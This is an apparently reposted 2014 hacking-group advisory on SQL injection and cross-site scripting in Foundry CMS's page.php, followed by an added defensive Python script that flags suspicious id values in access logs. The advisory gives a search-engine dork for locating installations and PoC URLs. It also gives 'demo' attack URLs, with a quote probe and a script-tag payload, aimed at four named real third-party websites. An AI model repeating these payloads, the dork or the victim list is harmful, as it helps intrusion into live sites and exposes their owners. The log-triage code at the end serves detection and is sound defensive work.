Channel: BOT24

Foundry CMS Multiple Vulnerability

Description:
[+] Title: Foundry CMS Multiple Vulnerability
[+] Date: 2014/07/20
[+] Author: Hekt0r
[+] Vendor Homepage: www.design-foundry.co.uk
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable Files: /page.php
[+] Dork: intext:"Site by The Design Foundry"

### POC:
[+] SQL Injection: http://site/page.php?id=[SQL-Injection]
[+] XSS: http://site/page.php?id=[XSS]
### Demo:
[+] SQL injection: http://www.resonatehub.co.uk/page.php?id=1'
                   http://www.sutcliffe.co.uk/page.php?id=1'
                   http://www.warmerenergyservices.com/page.php?id=25'
                   http://www.my-maintenance.com/page.php?id=1'
[+] XSS: http://www.resonatehub.co.uk/page.php?id=<script>alert(/xss/)</script>
         http://www.sutcliffe.co.uk/page.php?id=<script>alert(/xss/)</script>
         http://www.warmerenergyservices.com/page.php?id=<script>alert(/xss/)</script>
         http://www.my-maintenance.com/page.php?id=<script>alert(/xss/)</script>
### Credits:
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady Saeed.Jok3r, M4hdi,
                    ALIREZA_PROMIS And All members of Iran Security Group
[+] iransec.net
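
An added example, not part of the original advisory: a log-triage check that flags requests to /page.php whose id parameter is not a plain integer, which covers both the quote and the script-tag probes shown above. The combined log format, the integer-only id rule and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ids are short decimal integers (the advisory uses 1 and 25)
VALID_ID = re.compile(r"\d{1,10}")

def classify(line):
    """Return a reason string for a suspicious page.php request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group(1))
    if not parts.path.lower().endswith("/page.php"):
        return None
    # parse_qs percent-decodes, so %27 and %3Cscript%3E are compared as ' and <script>
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    if len(values) > 1:
        return "duplicate id parameter"
    for value in values:
        if VALID_ID.fullmatch(value):
            continue
        if "<" in value or ">" in value:
            return "markup in id (XSS probe)"
        if "'" in value or '"' in value:
            return "quote in id (SQL injection probe)"
        return "non-numeric id"
    return None

def triage(lines):
    """Return (line_index, reason) for every flagged line."""
    hits = []
    for i, line in enumerate(lines):
        reason = classify(line)
        if reason:
            hits.append((i, reason))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jul/2014:10:00:01 +0000] "GET /page.php?id=25 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Jul/2014:10:00:05 +0000] "GET /page.php?id=1%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [20/Jul/2014:10:00:09 +0000] "GET /page.php?id=%3Cscript%3Ealert(/xss/)%3C/script%3E HTTP/1.1" 200 4980',
    '192.0.2.10 - - [20/Jul/2014:10:00:12 +0000] "GET /contact.php?name=O%27Brien HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for index, reason in triage(SAMPLE_LOG):
        print(index, reason)
```

If ids really are integers, enforcing the same rule in page.php before the value reaches the query or the HTML output closes both issues at the source.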



//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.




